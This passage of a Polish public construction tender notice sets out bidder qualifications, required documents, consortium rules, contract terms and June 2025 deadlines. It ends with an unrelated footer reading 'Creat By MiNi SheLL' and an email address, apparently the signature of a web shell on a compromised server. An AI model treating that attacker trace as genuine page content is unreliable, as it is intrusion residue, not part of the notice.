którego zdolności w tym zakresie powołuje się wykonawca. <br/>W przypadku, gdy wykonawca powołuje się na doświadczenie nabyte w ramach zamówienia zrealizowanego w ramach konsorcjum (przez wykonawców wspólnie ubiegających się o udzielenie zamówienia), zamawiający wymaga, aby wykonawca wykazał, że bezpośrednio (faktycznie) wykonywał tę część zamówienia, która będzie odpowiadała zakresowi określonemu przez zamawiającego. <br/>b)	w zakresie zdolności zawodowej:<br/>wykonawca spełni warunek, jeżeli wykaże, że dysponuje osobami posiadającymi aktualne uprawnienia budowlane do kierowania robotami budowlanymi, tj.:<br/>-	co najmniej jedną osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej <br/>oraz posiadającą co najmniej 3 letnie doświadczenie w kierowaniu robotami budowlanymi, uczestniczącą w realizacji zamówienia w charakterze kierownika robót budowlanych, <br/>-	co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz posiadającą co najmniej 3 letnie doświadczenie w kierowaniu robotami instalacyjnymi, uczestniczącą w realizacji zamówienia w charakterze kierownika robót, w tym co najmniej roczne doświadczenie w kierowaniu robotami budowlanymi obejmującymi wykonanie/ montaż instalacji z zakresu ochrony przeciwpożarowej,<br/>-	co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz posiadającą co najmniej 3 letnie doświadczenie w kierowaniu robotami instalacyjnymi, uczestniczącą w realizacji zamówienia w charakterze kierownika robót.<br/>Zamawiający dopuszcza łączenie ww. funkcji przez jedną osobę w przypadku posiadania przez nią wymaganych uprawnień budowlanych oraz kwalifikacji i doświadczenia zawodowego.<br/>W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oceniany będzie ich łączny potencjał osobowy.<br/>Uwaga: <br/>Za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskim Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym) z zastrzeżeniem, art. 12a oraz innych przepisów ustawy Prawo budowlane (Dz. U. z 2025 r. poz. 418) oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2023 r. poz. 334). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postępowania wskazanych w SWZ przez zamawiającego - wg załącznika nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – zgodnie z załącznikiem nr 6 do SWZ; <br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - zgodnie z załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia wraz z ofertą przedmiotowych środków dowodowych chyba, że wykonawca oferuje rozwiązanie równoważne, wówczas zobowiązany jest złożyć dokumenty wskazane przez zamawiającego w pkt V.15 SWZ.<br/>Wykaz równoważności powinien być opatrzony takim samym podpisem elektronicznym jak oferta. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z ofertą wykonawca zobowiązany jest złożyć:<br/>a)	kosztorys ofertowy dla zamówienia podstawowego i zamówienia objętego prawem opcji sporządzony zgodnie z zasadami określonymi w pkt XIV.2 SWZ.<br/>b)	oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu - zgodnie z pkt IX.1 SWZ,<br/>c)	pełnomocnictwo – jeżeli dotyczy,<br/>d)	dokument stwierdzający ustanowienie przez wykonawców wspólnie ubiegających się o zamówienie, pełnomocnika do reprezentowaniu ich do udziału w przedmiotowym postępowaniu – jeżeli dotyczy, zgodnie z pkt X.3 SWZ,<br/>e)	oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy w przypadku wykonawców wspólnie ubiegających się o zamówienie – jeżeli dotyczy, zgodnie z pkt X.6 SWZ,<br/>f)	zobowiązanie podmiotu udostępniającego zasoby – jeżeli dotyczy, zgodnie z pkt XI.3 SWZ,<br/>g)	dokumenty w przypadku zaoferowania rozwiązania równoważnego – jeżeli dotyczy, zgodnie z pkt V.15 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając wspólną ofertę, w takim przypadku ponoszą solidarną odpowiedzialność za wykonanie umowy.<br/>2.	Wykonawcami wspólnie ubiegającymi się o udzielenie zamówienia mogą występować jako: <br/>a)	spółka cywilna – w rozumieniu przepisów art. 860-875 k.c., <br/>b)	wykonawcy, którzy zawarli porozumienie w celu wspólnego ubiegania się <br/>o udzielenie zamówienia, nie będący spółką cywilną w rozumieniu przepisów k.c., np.: tak zwane „konsorcjum” dwóch lub więcej wykonawców.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy <br/>w sprawie zamówienia publicznego. Pełnomocnictwo należy złożyć wraz z ofertą. <br/>4.	Zgodnie z pkt IX SWZ oświadczenie o braku podstaw do wykluczenia z postępowania oraz spełnianiu warunków udziału w postępowaniu oraz podmiotowe środki dowodowe składane na okoliczność potwierdzenia braku podstaw wykluczenia składa odrębnie każdy <br/>z wykonawców wspólnie ubiegający się o udzielenie zamówienia. <br/>5.	W odniesieniu do warunku udziały w postępowaniu wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których zdolności są wymagane. <br/>6.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy, sporządzone wg wzoru stanowiącego załącznik nr 8 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Szczegółowe warunki, na podstawie których zawarta zostanie umowa w sprawie zamówienia publicznego określone zostały w projektowanych postanowieniach umowy, stanowiących załącznik nr 3 do SWZ.<br/>2. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz w zakresie wskazanym w projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi oświadczeniami lub dokumentami należy złożyć za pomocą platformy https://wug.ezamawiajacy.pl, zgodnie z instrukcją zawartą w pkt XIII SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-05 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Poprzez ustawę Pzp w niniejszym ogłoszeniu zamawiający rozumie ustawę Prawo zamówień publicznych (Dz.U. z 2024 r.,poz. 1320).<br/><br/>Poprzez SWZ w niniejszym zamówienie zamawiający rozumie Specyfikację Warunków Zamówienia<br/><br/> Z zastrzeżeniem do pkt 4.2.10 niniejszego ogłoszenia Zamawiający wymaga wykonania przedmiotu zamówienia w terminie:<br/>1)	zamówienie podstawowe – 16 tygodni od dnia przekazania wykonawcy terenu robót,<br/>2)	zamówienie objęte prawem opcji –16 tygodni od dnia przekazania wykonawcy terenu robót.<br/><br/>Teren robót zostanie przekazany w terminie 3 dni roboczych od dnia zawarcia umowy, a w przypadku zamówienia objętego prawem opcji, w terminie 3 dni roboczych od dnia złożenia oświadczenia przez zamawiającego o skorzystaniu z tego prawa.

Creat By MiNi SheLL
Email: jattceo@gmail.com